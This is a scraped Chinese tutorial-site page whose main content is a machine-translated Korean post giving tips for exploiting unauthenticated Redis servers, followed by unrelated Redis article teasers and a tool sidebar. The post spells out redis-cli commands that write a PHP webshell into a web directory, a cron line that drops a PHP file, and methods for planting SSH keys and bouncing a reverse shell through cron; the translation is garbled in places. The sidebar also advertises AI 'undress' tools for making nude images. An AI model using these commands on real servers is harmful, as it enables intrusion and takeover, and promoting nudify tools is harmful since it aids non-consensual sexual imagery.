찾다
php教程PHP开发Redis 익명 액세스 활용 팁
Redis 익명 액세스 활용 팁Nov 14, 2016 am 09:22 AM
redis

Redis 데이터베이스는 최근 활용 프로세스와 결합하여 비교적 일반적입니다.

인트라넷 머신에서 Redis를 다운로드하고 make를 압축 해제할 필요가 없습니다

A) 일반적인 상황에서는 경로를 알고 셸을 작성합니다

./redis-cli -h IP  
config set dir /home/wwwroot/default/  
config set dbfilename redis.php 
set webshell " phpinfo(); ?>"  
save

B) 공개 키를 사용하여 비밀번호 없이 로그인합니다. 1 로컬에서 공개 키를 생성합니다. 2 Redis를 사용하여 공개 키를 백업합니다. redis 머신 C) Linux 작업을 사용하여 셸 리바운드

1 /var/spool/cron은 Linux 머신에서 기본 예약 작업입니다. cron이 켜져 있으면 Linux는 내부에서 정기적으로 작업을 실행합니다. 파일 이름은 사용자 이름 2입니다. Redis는 dbfilename을 위와 같이 설정하여 Shell을 직접 바운스합니다.

Redis는 일반적으로 Redis 서버의 권한을 얻기 위해 위의 세 가지 방법을 주로 사용한다고 요약합니다. 루트 권한으로 시작하면 권한이 매우 큽니다.

그런데 침투 과정에서는 항상 예상치 못한 상황이 발생하게 마련인데, 혹시 없나요?

첫 번째 방법은 redis 데이터베이스가 너무 커서 PHP 말이 한계를 초과하고 직접 500이 구문 분석되지 않는 경우 세 번째 명령을 통해 웹 디렉터리에 말을 쓸 수 있습니다. 🎜>

*/1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r
이런 말은 문제 없을 겁니다

두 번째 방법은 기계를 문제 없이 테스트했는데, 침투 환경에서는 문제가 있습니다. ssh 비밀번호 없이 로그인해야 합니다. ssh 디렉토리 권한 문제, 성공 확률은 너무 크지 않습니다

제가 가장 좋아하는 세 번째 방법은 간단하고 조잡하며 명확하며 권한 상승도 저장합니다( 중요한 머신이라면 일반적으로 루트 사용자가 예정된 작업을 하기 때문에 먼저 낮은 권한을 사용하는 것이 좋습니다) 사용자는 (루트에서) 상황을 확인하기 위해 쉘을 바운스하지만 연결을 허용하지 않는 매우 이상한 머신과 마주하게 됩니다 따라서 유일한 옵션은 웹 디렉토리에 쉘을 작성하거나 내부 네트워크에서 bash 쉘을 모니터링하고 직접 연결하는 것입니다.

Redis의 또 다른 발견은 Linux는 권한을 에스컬레이션할 수 없습니다. 또한 타사 소프트웨어를 통한 권한 에스컬레이션 방법인 redis를 통해 직접 권한을 에스컬레이션할 수도 있습니다.


성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
es和redis区别es和redis区别Jul 06, 2019 pm 01:45 PM

Redis是现在最热门的key-value数据库,Redis的最大特点是key-value存储所带来的简单和高性能;相较于MongoDB和Redis,晚一年发布的ES可能知名度要低一些,ES的特点是搜索,ES是围绕搜索设计的。

一起来聊聊Redis有什么优势和特点一起来聊聊Redis有什么优势和特点May 16, 2022 pm 06:04 PM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了关于redis的一些优势和特点,Redis 是一个开源的使用ANSI C语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式存储数据库,下面一起来看一下,希望对大家有帮助。

实例详解Redis Cluster集群收缩主从节点实例详解Redis Cluster集群收缩主从节点Apr 21, 2022 pm 06:23 PM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了Redis Cluster集群收缩主从节点的相关问题,包括了Cluster集群收缩概念、将6390主节点从集群中收缩、验证数据迁移过程是否导致数据异常等,希望对大家有帮助。

Redis实现排行榜及相同积分按时间排序功能的实现Redis实现排行榜及相同积分按时间排序功能的实现Aug 22, 2022 pm 05:51 PM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了Redis实现排行榜及相同积分按时间排序,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,希望对大家有帮助。

详细解析Redis中命令的原子性详细解析Redis中命令的原子性Jun 01, 2022 am 11:58 AM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了关于原子操作中命令原子性的相关问题,包括了处理并发的方案、编程模型、多IO线程以及单命令的相关内容,下面一起看一下,希望对大家有帮助。

一文搞懂redis的bitmap一文搞懂redis的bitmapApr 27, 2022 pm 07:48 PM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了bitmap问题,Redis 为我们提供了位图这一数据结构,位图数据结构其实并不是一个全新的玩意,我们可以简单的认为就是个数组,只是里面的内容只能为0或1而已,希望对大家有帮助。

实例详解Redis实现排行榜及相同积分按时间排序功能的实现实例详解Redis实现排行榜及相同积分按时间排序功能的实现Aug 26, 2022 pm 02:09 PM

本篇文章给大家带来了关于redis的相关知识,其中主要介绍了Redis实现排行榜及相同积分按时间排序,本文通过实例代码给大家介绍的非常详细,下面一起来看一下,希望对大家有帮助。

redis error什么意思redis error什么意思Jun 17, 2019 am 11:07 AM

redis error就是redis数据库和其组合使用的部件出现错误,这个出现的错误有很多种,例如Redis被配置为保存数据库快照,但它不能持久化到硬盘,用来修改集合数据的命令不能用。

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

mPDF

mPDF

mPDF는 UTF-8로 인코딩된 HTML에서 PDF 파일을 생성할 수 있는 PHP 라이브러리입니다. 원저자인 Ian Back은 자신의 웹 사이트에서 "즉시" PDF 파일을 출력하고 다양한 언어를 처리하기 위해 mPDF를 작성했습니다. HTML2FPDF와 같은 원본 스크립트보다 유니코드 글꼴을 사용할 때 속도가 느리고 더 큰 파일을 생성하지만 CSS 스타일 등을 지원하고 많은 개선 사항이 있습니다. RTL(아랍어, 히브리어), CJK(중국어, 일본어, 한국어)를 포함한 거의 모든 언어를 지원합니다. 중첩된 블록 수준 요소(예: P, DIV)를 지원합니다.

SublimeText3 영어 버전

SublimeText3 영어 버전

권장 사항: Win 버전, 코드 프롬프트 지원!

MinGW - Windows용 미니멀리스트 GNU

MinGW - Windows용 미니멀리스트 GNU

이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.

ZendStudio 13.5.1 맥

ZendStudio 13.5.1 맥

강력한 PHP 통합 개발 환경

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경